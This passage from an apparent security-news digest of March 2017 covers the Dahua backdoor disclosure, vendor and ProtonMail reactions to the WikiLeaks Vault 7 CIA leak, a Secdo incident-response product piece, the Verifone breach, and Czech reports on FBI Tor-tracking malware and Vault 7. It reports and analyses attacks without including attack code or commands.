Bashis did not notify Dahua before making his findings public, but he did remove the proof-of-concept (PoC) code he had released at the vendor’s request. The PoC will be made public again on April 5.
In the meantime, Dahua has published a security bulletin to warn customers of the vulnerability. The company said the flaw had been caused by a “small piece of code.”
“It’s important to note that the vulnerability is not the result of a malicious attack on any specific installation where our products are deployed; it was discovered by Bashis conducting independent testing of various suppliers' surveillance products,” the company said.
Dahua has so far identified 11 affected IP cameras and video recorders, and released firmware updates for them. The company’s investigation is ongoing and other impacted devices could be discovered in the upcoming days.
It’s important that users update the firmware on their devices as Dahua products are often targeted by Internet of Things (IoT) botnets. Researchers reported last year that many of the devices hijacked by the BASHLITE and Mirai botnets had been surveillance products from Dahua.
Security Firms Assess Impact of CIA Leak
8.3.2017 securityweek BigBrothers
Security firms have started assessing the impact of the CIA hacking tools exposed on Tuesday by WikiLeaks as part of the leak dubbed “Vault 7.”
Files allegedly obtained from a high-security CIA network appear to show that the intelligence agency has tools for hacking everything, including mobile devices, desktop computers, routers, smart TVs and cars.
The published files also appear to show that the CIA has targeted the products of many security solutions providers, including anti-malware and secure messaging applications. The list of affected vendors includes Symantec, Kaspersky, Avira, F-Secure, Microsoft, Bitdefender, Panda Security, Trend Micro, ESET, Avast, AVG, McAfee, Comodo and G Data.
While WikiLeaks has not released any of the exploits it has obtained, an initial investigation conducted by security firms indicates that the CIA’s capabilities may not be as advanced as some have suggested.
11h
Rob Graham٩(●̮̮̃●̃) @ErrataRob
...in 2017, phones with "monitor mode" are now some CIA cyber super weaponhttps://twitter.com/wikileaks/status/839210002694942725 …
Follow
Rob Graham٩(●̮̮̃●̃) @ErrataRob
..what Wikileaks won't tell you: almost everything in their dump is dreadfully ordinary, widely known by the cybersec/hacking community
4:46 AM - 8 Mar 2017
193 193 Retweets 213 213 likes
Bitdefender told SecurityWeek that the public Vault 7 files show that the CIA had been having problems evading the company’s products.
Kaspersky Lab said one of the vulnerabilities mentioned in the report was patched in 2009, while another was addressed in December 2015.
“All current Kaspersky Lab solutions are subject to mandatory testing against these vulnerabilities prior to release. The products mentioned in the Wikileaks report (KIS 7, KIS 8, WKSTN MP3) are outdated versions of Kaspersky Lab software and have been out of the technical support lifecycle for several years,” the security firm said in an emailed statement.CIA leak
“We would like to stress that the documents published by Wikileaks do not describe any computer breaches against Kaspersky Lab, or against any other security firms or customers, but instead depict efforts to reverse engineer and find vulnerabilities in computer security software products,” it added.
Comodo also said its product appeared to pose problems to the CIA. WikiLeaks mentioned that the agency had bypassed Comodo’s product by hiding malware in the Recycle Bin, but the vendor said such tricks would not have worked against versions of its product released in the past four years.
“What we are seeing in the leaked documents are their desperate attempts to build a hack, step-by-step, with the ultimate goal of achieving a total bypass of the security, such as trying to find something like a kernel exploit. But as their email says, in the case of Comodo, they end up with nothing,” said Melih Abdulhayoglu, founder and CEO of Comodo.
Microsoft, whose EMET and Security Essentials products are mentioned in the leak, told SecurityWeek that it’s aware of the report and looking into it. Trend Micro and F-Secure are also investigating.
“F-Secure is mentioned in the leak, citing the CIA can potentially bypass some of our products. But the question is really not whether the CIA can bypass our products, the answer to that is always yes. If they cannot do it right now, they invest another million to find a flaw,” said F-Secure’s Mikko Hypponen.
Panda Security says it has yet to find exploits or tools targeting its products in the publicly available files.
“That doesn't mean there won't be any, at the end of the day we are talking about software. We expected to be there, the fact that we do not collaborate in any way to spy on our users turns Panda into a target for the CIA, FSB, and that kind of organizations,” said Luis Corrons, Technical Director of PandaLabs.
As for enterprise security vendors, Juniper Networks has not found any evidence that its products have been targeted, but there appear to be several exploits targeting Cisco devices. Cisco has yet to release any information.
Secure messaging tools not compromised
WikiLeaks reported that the CIA had found a way to bypass the encryption of Signal, Telegram, WhatsApp and other secure messaging applications.
While many jumped to conclude that the agency had actually broken the encryption of these apps, WikiLeaks actually meant that gaining access to a mobile device using iOS and Android exploits could have given the CIA access to conversations, without having to break their encryption.
Wikileaks CIA Files – What this means for Internet security and encryption
8.3.2017 securityaffairs BigBrothers
Earlier today, Wikileaks dumped a large database of secret documents from the CIA in a released dubbed Vault7. Here we do a deeper analysis of the leak and the broader implications on online security and encrypted services.
Our in-depth analysis of the leaked CIA files is found at the bottom of this post. First, we will discuss the main question on everybody’s mind – how are encrypted services like ProtonMail impacted, and what insights did we gain into the strategies of state-backed attackers.
No, Encryption Is Not Dead
Immediately after the news broke, stories began circulating, along the lines of “Signal/Whatsapp encryption broken!”, fueled in part by Tweets put out by Wikileaks. This was followed predictably by online chatter speculating into whether or not ProtonMail had been cracked.
Vault7
We can state quite equivocally that there is nothing in the leaked CIA files which indicates any sort of crack of ProtonMail’s encryption. And despite claims to the contrary, there is also no evidence that Signal/Whatsapp end-to-end encryption has been breached. Here’s what we do know:
Over the past three years, the CIA has put together a formidable arsenal of cyberweapons specially designed to gain surveillance capabilities over end-user devices such as mobile phones and laptop/desktop computers. These advanced malwares enable the CIA to record actions such as keystrokes on a mobile device, allowing them to conduct surveillance without breaking encryption. Through this technique, US intelligence agencies can gain access to data before they have been encrypted. This is in fact the only way to achieve data access, because cracking the cryptography used in advanced secure communication services such as ProtonMail and Signal is still impractical with current technology.
In other words, the core cryptographic algorithms and techniques used by ProtonMail and other encrypted services remain secure. The exploitation of user endpoints (mobile phones, personal computers, etc) is actually not a new technique, but one that has existed since the first malware was created. This unfortunately is not something that cryptography is designed to defend against, as encryption by itself cannot guarantee the security of end-user devices. What the CIA files dumped by Wikileaks do reveal however, is a monumental shift in strategy since the last disclosure of this kind was made by Edward Snowden in 2013.
State-backed Cyberattack Strategy is Changing
ProtonMail is tool that is used by millions of people around the world to ensure email communications security. In addition to ordinary people and businesses, ProtonMail is also used by journalists, activists, and dissidents, who often require protection from government surveillance for their personal safety. Because of these factors, we make it our business to carefully study and understand state adversaries in order to better protect our userbase.
The Wikileaks CIA files is therefore, a comprehensive update into state cyberwarfare strategies since Snowden gave us the first edition. In fact, the trends that the files reveal are arguably global, since it is highly probable that other major players in this space (Russia, China, UK, Israel, etc) will have independently reached the same conclusions regarding overall strategy.
Some of the most interesting revelations from the Snowden leaks was the extent in which the NSA actively sought out information from the US tech giants, either with consent, or even without consent. This made a lot of sense, because the biggest global databases of sensitive personal data does not belong to the NSA, but actually to companies like Google and Facebook, who have already shown ample willingness to exploit such data for profit, sometimes via unscrupulous means.
Since 2013 however, the world has changed. Consumer and business awareness of online privacy and security is at an all time high, and more and more people around the world are increasingly choosing more secure services which respect privacy. Today, end-to-end encryption has gone mainstream, and services such as ProtonMail and Whatsapp boast millions of regular people as users. The use of end-to-end encryption means services such as ProtonMail are not actually able to decrypt user data. Even if we wanted to compromise user data, we do not have the technical means to decrypt the user emails. Furthermore, even if an attacker breached ProtonMail servers, all the emails stored on our servers are encrypted, so an attacker also would not be able to read user emails.
It’s clear from the leaked CIA documents that as the world has changed, stated-backed cyberattackers have also evolved. As we describe below, the varied leaked files are tied together by a common thread – an almost singular focus on producing malware to attack end-user devices. This is a logical response to the rise of end-to-end encrypted services such as ProtonMail. Services such as ProtonMail have significantly raised the barrier for obtaining data directly from the service provider, and many services are now based outside of the United States, beyond the reach of legal coercion. As such, it has now become easier, and more productive to directly hack individual users.
This opens up a terrifying new narrative where government spies are actively deploying viruses and trojans against their own citizens, joining the ranks of common cybercriminals. While this is by no means good news for privacy rights worldwide, it is in some ways, a win for privacy tech, because governments are having to shift away from mass surveillance and towards more targeted surveillance. In short, services such as ProtonMail are doing exactly what they were designed to do, which is raising barriers to large scale mass surveillance.
Our initial analysis into the Wikileaks CIA documents can be found below. Questions can be directed to media@protonmail.ch. If you would like to start benefiting from secure email, you can get a free ProtonMail account here.
Best Regards,
The ProtonMail Team
ProtonMail Analysis of Wikileaks CIA Documents
#Vault7 in a sentence: It is a leak about the CIA’s hacking arsenal used against foreign governments and citizens both domestically and abroad.
Name of the database: Vault7. It is the first part in a series of leaks titled Year Zero.
Origin: CIA’s Center for Cyber Intelligence unit in Langley, Virginia USA
Volume: 7,818 web pages with 943 attachments. According to Wikileaks, the entire archive of CIA material consists of several hundred million lines of computer code. Estimated to bigger than the Snowden leaks (unconfirmed).
Dates of documents: from the time Snowden left the intelligence community till 2016. 2013-2016.
Intention: the source of the information told WikiLeaks in a statement that they wish to initiate a public debate about the “security, creation, use, proliferation and democratic control of cyber weapons.”
How is it different from the Snowden leaks: Snowden leaks exposed the NSA and its techniques of blanket surveillance on citizens and governments around the world. Vault7, on the other hand, exposes the CIA and what technologies it uses in cyber warfare against foreign governments as well as against targeted individuals.
What did we learn so far?
As we are examining the documents, we have identified that the leak concerns the CIA and what cyber weapons it uses. Over the next weeks we will continue to verify and update the information. Below is what we know so far about the programs used by the CIA, legality of the operations, and what this means for your privacy and security.
Programs used by the CIA
Weeping Angel – It is a program that transforms the microphones of smart TVs into surveillance tools. By manipulating the hardware, CIA hackers are able to turn on people’s smart TVs and listen to users’ conversations. In effect, Weeping Angel transforms smart TVs into bugs.
Our team quickly drew parallels between Weeping Angel and other surveillance tools described by Snowden. Weeping Angel is a technique that bears close resemblance to Nosey Smurf, a tool used by UK’s GCHQ to turn on a phone’s microphone and use it for audio surveillance. While Tracker Smurf – is a geo-location tool that offers a more accurate method of locating a phone and its carrier than using triangulation.
Zero day – Refers to a general type of vulnerability used by the CIA against any adversary’s device. WikiLeaks reports that Zero Day has been primarily used against companies in industrial espionage. In 2013, Snowden, also, revealed that the NSA was committing industrial espionage against Brazilian, Russian and European oil companies, banks, airlines and trade delegations. According to Vault7, the program produced over “a thousand hacking systems, trojans, viruses, and other “weaponized” malware.”
Hive is a multi-platform CIA malware suite that can be specifically utilized against states. “The project provides customizable implants for Windows, Solaris, MikroTik (used in internet routers) and Linux platforms and a Listening Post (LP)/Command and Control (C2) infrastructure to communicate with these implants.”
There are many parallels between Hive and Zero Day and the 2010 Stuxnet virus that attacked and infected the Iranian Nuclear program. Although no state took responsibility for the attack in 2010, Stuxnet has been linked by political pundits to American and Israeli surveillance and intelligence agencies due to its degree of sophistication.
Hacking mobiles
Vault7 also reveals that the CIA has developed advanced capabilities for hacking mobile phones. The leaks show that the agency developed and used its tool to primarily control mobile phones and then extract data from them.
CIA’s Mobile Development Branch produces malware to pull data from iPhones and other Apple products running iOS, such as iPads. MDB also targets Android OS which is a much popular system than iOS and is the default operating system for the majority of smartphones including Sony, Samsung and Google Pixel. “Year Zero” shows that as of 2016 the CIA had 24 “weaponized” Android “zero days” which it has developed itself and obtained from GCHQ, NSA and cyber arms contractors.
Framing other governments
We were alarmed by the discovery of a tool that allows the CIA to potentially frame foreign governments for its cyber warfare acts. It works as follows. Imagine that each government or a hacking group has its own signature move or malicious software or a combination of both that it uses to attack its targets. After a while, whenever an attack occurs, it can be linked to to group based on that fingerprint.
WikiLeaks reports that a program ran by its Remote Devices Branch called UMBRAGE “collects and stores an extensive library of attack techniques”. According to Vault7, amassed techniques include those that are frequently used by Russia.
Some of the techniques currently at CIA’s disposal via UMBRAGE include: keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques.
Vault7 reveals that the CIA has also produced rules on how its malware should be hidden when deployed to avoid any fingerprints leading back to the US or the agency.
Was this legal?
Preliminary findings reveal that the CIA had known about and enhanced the dissemination of these tools. In fact, according to WikiLeaks, the agency wanted the programs to be legal so that agents or CIA sponsored hackers can operate with full impunity.
According to Vault7, if ‘CIA software was classified then officers could be prosecuted or dismissed for violating rules that prohibit placing classified information onto the Internet. As a result- “the CIA has secretly made most of its cyber spying/war code unclassified”. The U.S. government is not able to assert copyright either, due to restrictions in the U.S. Constitution. This means that cyber ‘arms’ manufactures and computer hackers can freely “pirate” these ‘weapons’ if they are obtained. The CIA has primarily had to rely on obfuscation to protect its malware secret.
Why is this critical?
While we are still mapping the dangers of such findings and capabilities, some conclusions are clear.
The CIA can frame other governments
By using Hive and Zero Day, the US can wage a cyber attack against a nation state while purposefully leaving behind a trace that leads to another state. As governments around the world migrate their infrastructure control to cyber space – any cyber attack can have a devastating effect if targeted against hospitals, power plants or telecommunications providers.
CIA backdoors can be exploited by others
When the CIA undermines a service or a device, it creates the backdoor that can be abused by other parties. With the agency’s newly revealed tools, everything people do or say around their phones and TV’s can create a very revealing and intimate picture of people’s lives.
Secdo Automates End-to-End Incident Response with Preemptive IR
8.3.2017 thehackernews Security
As vast volumes of digital data are created, consumed and shared by companies, customers, employees, patients, financial institutions, governments and so many other bodies, information protection becomes a growing risk for everyone.
Who wants to see personal customer purchasing data flying into the hands of strangers? What company can tolerate the pilfering of its intellectual property by competitors? What government can stand idly by while its military secrets are made public?
To protect their valuable and private information, organizations purchase numerous cyber security systems – like intrusion detection systems, firewalls, and anti-virus software – and deploy them across their networks and on all their computers.
In fact, a typical bank, manufacturer or government department might have dozens of such products operating at all times.
Cyber security systems work non-stop to thwart network infiltration and data-theft. Whenever they notice an activity that seems outside the scope of regular use, they issue an alert to notify cyber security personnel who investigate the reason for the alert and take remedial action if necessary.
For example, if someone tries to access a computer and repeatedly enters the wrong password, an alert will be issued. When an email attachment containing a virus is opened, another alarm will be raised.
Despite all of these security systems and their alerts, strong networks are breached, and the information is stolen. Why does this still happen?
Over-Detection and False Positives
Cyber security systems work by noticing unusual activities and behaviors of people and software. But they often get it wrong. Try as they may, in order to be ultra-careful, cyber security systems flag a lot of activities that they determine to be potentially malicious but, in reality, are not.
Yes, you keyed in your password three times until you got it right, but you aren’t a data pirate. That still causes an alert.
From your office computer, you inadvertently accessed a website that is off-limits to your company. Honest mistake, but another alert.
This happens so frequently that, every day, hundreds or even thousands of alerts turn out to be nothing of note.
Can you believe it? The average enterprise in the US receives more than 10,000 alerts every day. Most of them aren’t incidents that should demand attention. But how do you know until you look into them?
This daily load of false positives distracts cyber security professionals from dealing with legitimate security alerts.
As more and more time is wasted chasing after false positives, security staffs have to resort to triage – that is, they try to figure out which alerts are important and require a response, and which ones are false and should be ignored. They aren't always accurate. Sometimes, an analyst spends weeks tracking down an incident that turns out to be irrelevant.
Conversely, sometimes, the alert that is ignored is the real emergency!
Distracted to Ruin
A good example that shows how false positives can be ruinous to an organization is the Target Data Breach.
Target, the second-largest discount-store retailer in the United States, was forced to admit to more than 70 million shoppers that their personal and financial information had been compromised.
With a large cybersecurity team and a significant budget for tools and technologies that protect data, how could this happen to Target? (Or Ebay? Or JP Morgan Chase? Or Yahoo?)
Target's problem wasn't that some sort of hacker had succeeded in bypassing its robust cyber security systems. In fact, the company's detection systems deployed specifically to monitor such intrusion attempts had generated alerts confirming that malicious software was present. So why wasn't it dealt with?
As these important alerts were buried among thousands of daily false positives, they did not achieve high enough attention to warrant the prompt action that they demanded. They were missed. This simple oversight led to one of the largest and most costly data breaches in history, estimated at more than $300 million!
In short, while detecting cyber threats and alerting security personnel is crucial, it is not nearly enough. Organizations must institute an accurate, real-time alert validation methodology that unfailingly determines which of the thousands of daily alerts deserve attention and which are just "noise."
But the devil is in the details.
Secdo Automates the Incident Response Process End to End
Secdo's Preemptive Incident Response platform automatically validates every single alert, distinguishing between false positives and real threats that deserve serious investigation.
Secdo provides all the context – the "who, what, where, when and how" – to help security analysts determine the severity of a real alert. Then, Secdo empowers security teams to respond quickly and precisely to combat the threat.
The Secdo platform comprises three modules:
Observer
Analyzer
Responder
Observer
According to Secdo, effective cyber security begins with preemptive data collection. Like a battery of digital cameras that see and record everything, Observer records and stores every activity that occurs on every endpoint (computer) and server (we call these "hosts") in the network.
Everything on every host, even when they number in the tens of thousands! Observer enables security and IT teams to see how any host, user, or process behaved now or in the past – just like the ability to view any video from any camera now or in the past at the click of a mouse.
Observer enables quick investigations and threat-hunting. It provides facilities for easy ad-hoc inquiries, enabling analysts to investigate any alert and hunt for threats effectively. Security analysts can use the intuitive investigation interface to ask questions about any event and always get a conclusive answer.
For example:
Who accessed the website www.youshouldnotgothere.ru on January 24th between 13:31 and 15:09?
Which hosts have file iamarealthreat.exe on their hard drive?
Which endpoints sent out companyfinancials.xlsx in emails last night?
Answers to these and other questions are displayed promptly and helpfully to the security analyst.
Results returned from an Observer inquiry
Analyzer
Non-stop, Analyzer correlates the mass of data stored by Observer. If Observer is like thousands of digital cameras recording everything, Analyzer is the intelligence that connects all the individual videos into coherent stories that can be reviewed anytime.
For example, malicious software from my boss’s computer is trying to send data out to a foreign website, an event that triggers an alert. It sounds like a simple case, but the full story might read like this:
"Yesterday, I received an email from a particular address. I clicked on the attachment, looked at it, and thought about it no more. However, unbeknownst to me, the attachment wrote a bit of malware on my hard drive. Two hours later, it started to search my computer until it found a password file that enabled it to jump to my boss’s computer. There, at midnight, the malware woke up, searched my boss’s hard drive until it found a file called secretcompanyplans.docx. It connected to a website in Ukraine and attempted to send the file. This is what triggered the alert."
The security analyst will see the limited information in the alert which says: "The boss’s endpoint attempted to connect to www.ohnodontgothere.ua."
How can the analyst know the entire story of the alert in order to understand that there is an attachment to an email on my computer that started the whole incident?
Merely preventing access to the bad website will not eradicate the danger. Perhaps this piece of malware is so smart that it will wake up again and try some other tricks like sending another file to a different website. That will just trigger another alert and require another security analyst to fix the same problem tomorrow.
The full story is necessary to fix the entire problem once and for all..
Secdo's Analyzer helps analysts get to the root of every problem and understand its full scope so they can remediate it at its root cause.
Analyzer's Causality Engine places all events received from the Observer data into causality chains (the story) in anticipation of alerts, preparing the forensics that will be necessary for any future security investigation.
As alerts are triggered from any source (any of the many cyber security systems that the organization has deployed), Analyzer automatically correlates the alerts with their appropriate causality chains, placing them into their full context. IT and security teams are able to see the chain of events (the entire story) of exactly what happened from this moment backward into the past.
With the full context, Analyzer can accurately distinguish false alerts so that analysts don’t have to endure unnecessary distractions. It accurately priorities and presents each genuine alert, displaying the entire context including the attack chain starting from root cause (how did this incident start?), all entities involved (where has it spread?) and damage assessment (what did the bad guys do to us so far?) – the entire story.
With all this information presented graphically before their very eyes, security analysts can properly analyze real alerts and respond correctly in seconds.
Analyzer presents a graphic representation of the entire causality chain including root cause
In our example, Secdo would enable the analyst to see that the malicious attachment on my computer started the entire chain of events, that it jumped to my boss's computer and that both malicious processes must be cleaned as well as other files or commands they might have written and anything else that is pertinent to this incident.
Responder
So, what do you do once you have found an actual cyber breach that requires a firm and accurate response?
Before Secdo, IT personnel usually had to confiscate your computer, wipe it clean and reinstall Windows and all your applications and data files. Everything. This could take hours or even days. What an interruption to your productivity and what a cost to the company!
With Secdo, the process is a lot faster and smarter, and doesn't interfere with your work. Responder gives security and IT people the ability to remotely access and surgically resolve any threat on any host without impacting productivity.
Responder provides numerous powerful containment and remediation capabilities including patented ICEBlock™ that safely freezes a process in memory while the endpoint remains on the network. You can keep working securely while all this takes place.
Responder enables IT to deal with specific threats on any host without impacting user productivity
Responder even takes security a step further. Its plentiful and powerful response capabilities can be fully automated adding protection to the organization into the future.
Conclusion
Digital data is an attractive target for cyber attackers who would steal it for nefarious purposes. Organizations employ security analysts and deploy numerous security products to help them defend against cyber attacks.
These products may generate thousands of alerts every day, and most of these are false positives. Due to the overwhelming daily volume, security teams cannot deal with all alerts and must triage them.
Analysts need an automatic, accurate way to separate out the false positives and prioritize the real ones so that they can focus on real threats. They need to see the entire scope of incidents in order to determine the proper course of remediation. They require remote, surgical response tools that enable them to accurately eradicate threats while maintaining business productivity.
Secdo's Preemptive Incident Response (PIR) transforms the traditional IR process from reactive to proactive by continuously collecting and storing all host activity data – BEFORE an incident occurs.
All activity data from all endpoints and servers (hosts) is automatically correlated in causality chains (context) in anticipation of future incidents. As alerts are ingested from detection systems, they are connected with their appropriate causality chains, preparing full forensic evidence even before Incident Response teams get involved.
With full context, false positives can be eliminated accurately, and real alerts can be prioritized correctly. Security analysts can quickly investigate each alert, already observing its root cause, full activity, entities involved and damage assessment.
With this level of visibility and context, accompanied by a suite of advanced surgical remediation tools, analysts can respond remotely, promptly and precisely to threats while maintaining business productivity.
Verifone Investigating 'Limited Cyber Intrusion'
8.3.2017 securityweek Cyber
Verifone is investigating a breach that it has described as "a limited cyber intrusion" into its corporate network." It believes that "that due to our immediate response, the potential for misuse of information is limited."
KrebsOnSecurity has published an internal memo dated Jan. 23 sent to all Verifone staff and contractors. It says the payment solutions firm is currently investigating an IT control matter, and asks everyone to change their employee passwords within 24 hours. It also states that employees will no longer be able load new software onto their company desktop and laptop computers; that is, local admin privileges are being removed.
These two actions are typical responses to an actual or likely breach -- although many security professionals will be surprised that staff still had local admin status. The memo was sent by Steve Horan, Verifone's CIO, rather than CISO David Galas. At this time, the Krebs report is the sole source of information on the breach.
A Verifone spokesperson told Krebs, "In January 2017, Verifone's information security team saw evidence of a limited cyber intrusion into our corporate network. Our payment services network was not impacted. We immediately began work to determine the type of information targeted and executed appropriate measures in response. We believe today that due to our immediate response, the potential for misuse of information is limited." At that time he declined to give any further information.
However, a 'source' told Krebs that the internal memo was in response to warnings from Visa and Mastercard. Historically, many breaches are discovered not by organizations themselves, but by banks and financial institutions detecting suspect patterns in account usage. If this is what happened, and the 'limited incursion' is related to the Visa and Mastercard alerts, then the implication is that the breach was more extensive than Verifone is currently claiming.
However, Krebs' source (who seems to have deep inside knowledge of the breach) goes further, claiming that Mastercard and Visa suggested that "the intruders appeared to have been inside of Verifone's network since mid-2016." He also told Krebs "there is ample evidence the attackers used some of the same toolsets and infrastructure as the cybercrime gang that last year is thought to have hacked into Oracle's MICROS division."
If this is true, although it cannot currently be verified, then the finger points at the gang usually known as Carbanak or Anunak. In February 2015, Kaspersky Lab described this gang as a group of cybercriminals from Russia, Ukraine and other parts of Europe and China.
Given that the Verifone memo locks down endpoints and changes passwords, it seems likely that the initial intrusion has been traced to an employee device. Statistically, it would be a reasonable assumption that someone fell for a phishing attack and installed malware; but that is just another assumption at this point. However, if Krebs' source is correct, then the attackers had been inside Verifone for at least six months before this remedial action was taken.
Six months gives attackers ample time to perform lateral movement. This would be hindered by effective network segmentation within Verifone. It seems that this might be the case. The Verifone spokesperson described it as a limited incursion. Krebs' source only mentions one affected area of Verifone: "A customer support unit based in Clearwater, Fla. that provides comprehensive payment solutions specifically to gas and petrol stations throughout the United States - including, pay-at-the-pump credit card processing; physical cash registers inside the fuel station store; customer loyalty programs; and remote technical support."
This now seems to have been confirmed by Verifone. Following Krebs' initial report it issued an update to its original statement. "According to the forensic information to-date, the cyber attempt was limited to controllers at approximately two dozen gas stations, and occurred over a short time frame. We believe that no other merchants were targeted and the integrity of our networks and merchants' payment terminals remain secure and fully operational."
On the surface, it appears that Verifone has indeed experienced a breach, but the effects were limited and have been contained. Nevertheless, we will need to await further developments before this is independently confirmed. Six months remains a lengthy period to have attackers as advanced and experienced as Carbanak inside your networks; and it remains a possibility that they may have moved laterally to other parts of the Verifone network.
FBI díky svému malwaru chytla pedofila. Žalobu ale stahuje, nechce zveřejnit své metody
8.3.2017 Lupa BigBrother
Získávání důkazů v případě kybernetické kriminality jde občas dál, než by se soudům mohlo líbit.
Americká FBI v loňském roce dokázala detekovat IP adresy lidí, kteří přes síť Tor chodili na stránky s dětskou pornografií, konkrétně na Playpen. Za základě tohoto odhalení padly u amerických soudů žaloby. To by mohl být konec příběhu, soudní proces ale situaci poněkud komplikuje.
Jeden z obžalovaných, Jay Michaud, totiž zažádal o to, aby byly zpřístupněny veškeré detaily toho, jak se k němu FBI dostala. Soud jeho žádosti vyhověl. To FBI postavilo před problém: pro úspěšné odsouzení v daných případech by musela zveřejnit, jaké kroky konkrétně podnikla. FBI a americké ministerstvo spravedlnosti nakonec tento krok odmítly a státní žalobci obvinění stahují.
FBI totiž vyvinula vlastní malware, který využíval Tor a dokázal IP adresy vypátrat. A pokud by FBI musela podrobnosti zveřejnit, zřejmě by musela odhalit i to, jak přesně tato „networks investigative technique“ (NIT) funguje.
Případ podrobněji rozebírá Ars Technica. Kolem případu bude zřejmě ještě spousta debat. Mohlo by jít o precedens, který bude mít vliv na další podobná vyšetřování.
Neautorizovaný přístup
FBI a další složky z oblasti vymáhání práva pro svoji práci v kybernetickém pátrání používají více zdrojů informací a postupů. „Je úplně běžné, že FBI posíláme data. V drtivé většině případů je to jednosměrný kanál. Měli jsme pouze pár případů, kdy nám také FBI poskytla data a sami nám chtěli pomoci,“ říká pro Lupu technický ředitel společnosti ESET Juraj Malcho.
TIP: Zaplať, nebo nedostaneš data. Příběh o tom, jak lehce vám může zatopit ransomware
FBI od soukromých kyberbezpečnostních firem získává informace a vodítka. Tyto zdroje pak využívá k tomu, aby se dostala například ke kontrolním serverům botnetů (CNC), IP adresám a podobně. Pokračuje tam, kde pravomoci soukromých firem končí.
Problémem může být to, když FBI získá důkazy způsobem, který nemusí být zcela legální. Nabourání se přímo do problematických serverů je stále neautorizovaný přístup, jde o formu aktivního hackování. FBI proto od firem převezme informace a snaží se s nimi pracovat tak, aby následně soudní znalci neměli problém.
Ani samotné kyberbezpečnostní firmy se ne vždy pokouší aktivně do serverů dostat. „My aktivně CNC servery nehackujeme. To už je na pomezí, jde o určitý neautorizovaný přístup,“ uvádí Malcho. „Jsme soukromá firma a máme jisté limity v tom, co můžeme dělat. Když se k někomu dopátráme, ozveme se policii.“
Sondování na darknetu
Jsou ale společnosti, kteří se nebojí vydat hlouběji. Nemají s tím legislativní či morální problém. Policie spolupracuje i s takovými firmami.
„Pokud by se někdo naboural do CNC serveru a získal kompromitující materiál, po kterém FBI jde nejvíc, typicky dětské porno, pracuje se s tím, že se tak dělo v dobré víře. Je to také o reputaci,“ doplňuje Malcho.
„Už dříve jsem na konferenci narazil na člověka z FBI, který tuto problematiku řeší. Říkal, že když narazíme na dětské porno, máme od toho okamžitě dát ruce pryč, protože oni to sledují a je jim jedno, kdo jsme. Když chceme dát vodítko, máme ho poslat, ale nezkoumat dále.“
Firmy, které se vydávají i za hranice práce běžných kyberbezpečnostních společností, se aktivně snaží působit a dostávat také na fóra na darknetu, kde se domlouvají obchody, nabízí přístupy, nelegální zboží a tak dále.
Dostat se tam je ale těžké, často je k tomu potřeba reputace v kyberkriminální komunitě, výměna informací, dokazování aktivit. „Pohybujeme se jen na povrchu. Jde spíše o individuální průzkum,“ popisuje nový technický šéf ESETu. „Sledování fór vyžaduje značné množství času, a i z toho důvodu se obracíme na partnery, kteří se na něco takového specializují. Ale nevěřím, že by partneři měli kontakty až někam úplně hluboko,“ dodává.
Nedá se moc čekat, že by si vlastníci či nájemci CNC a dalších serverů na případnou protiprávnost útoků stěžovali. Jen těžko budou někoho žalovat, že jim naboural server s nelegálním obsahem. Serverové kapacity se pronajímají často rovněž na darknetu. Jde o specializované služby, které využívají jurisdikce daných zemí, kde to nikoho netrápí.
CIA umí prolomit Linux, televize, routery i telefony, ukazuje WikiLeaks
8.3.2017 Root.cz BigBrother
Server WikiLeaks zveřejnil první část dokumentů, které unikly americké CIA. Podle nich má organizace nástroje pro útok na celou řadu platforem i zařízení. Kauza má šanci stát se případem Snowden 2.0.
Server WikiLeaks otevřel projekt Vault 7 a uvolnil poklad v podobě první části dokumentů uniklých americké CIA. Balík 8378 dokumentů byl zveřejněn pomocí BitTorrentu a zašifrovaného archivu. Můžete si stáhnout soubor torrent, heslo k 7-Zip archivu je:
SplinterItIntoAThousandPiecesAndScatterItIntoTheWinds
Informace měly být původně zveřejněny v online tiskové konferenci, kterou měl vést Julian Assange. Ukázalo se ale, že jeho účty na Facebooku a Periscope jsou pod útokem. Proto bylo heslo k archivu prozrazeno dříve, aby nebyly zveřejňované dokumenty ohroženy.
Follow
WikiLeaks ✔ @wikileaks
Press conf under attack: Facebook+Periscope video used by WikiLeaks' editor Julian Assange have been attacked. Activating contingency (1/2)
2:03 PM - 7 Mar 2017
3,106 3,106 Retweets 3,579 3,579 likes
Dokumenty ukazují softwarové zbraně, které je schopna CIA nasadit proti nejrůznějším platformám a technologiím. Agentura má k dispozici exploity na iPhone, Android, Windows, Linux, Mikrotik, Solaris, macOS a dokonce některé televize Samsung. U nich je možné na dálku zapnout mikrofon a použít je k odposlechu okolí.
WikiLeaks popisuje, jak oddělení s oficiálním názvem Center for Cyber Intelligence (CCI) produkuje tisíce útočných nástrojů s nejrůznějším určením. Tahle neobyčejná sbírka, která obsahuje stovky milionů řádek kódu, dává držiteli všechny útočné možnosti CIA, píše server v tiskové zprávě.
Informace o databázi byly předem zveřejněny na Twitteru, poté, co organizace zjistila, že je pod útokem, přešla na plán B a podrobnosti zveřejnila dříve.
Follow
WikiLeaks ✔ @wikileaks
RELEASE: CIA Vault 7 Year Zero decryption passphrase:
SplinterItIntoAThousandPiecesAndScatterItIntoTheWinds
2:06 PM - 7 Mar 2017
5,360 5,360 Retweets 6,332 6,332 likes
Není překvapením, že se WikiLeaks do CIA opřela. Podle všeho jde o organizaci s velkou mocí a malou možností kontroly. Hackeři z CIA vytvořili více kódu, než kolik ho k provozu potřebuje Facebook. CIA tak fakticky vytvořila ‚vlastní NSA‘ s ještě menší zodpovědností a bez odpovědi na otázku, proč je obrovský rozpočet utrácen na duplikaci kapacit konkurenční agentury.
Organizace slibuje, že veškeré dokumenty důkladně zkontroluje, aby nezveřejňovala „nabité zbraně“. Některé informace také byly anonymizovány. Edward Snowden se na svém Twitteru k celé věci vyjadřuje a podle jeho slov dokumenty vypadají věrohodně. Názvy uvedené v textech jsou pravé a znají je jen lidé zevnitř.
Follow
Edward Snowden ✔ @Snowden
Still working through the publication, but what @Wikileaks has here is genuinely a big deal. Looks authentic.
5:53 PM - 7 Mar 2017
8,683 8,683 Retweets 11,939 11,939 likes
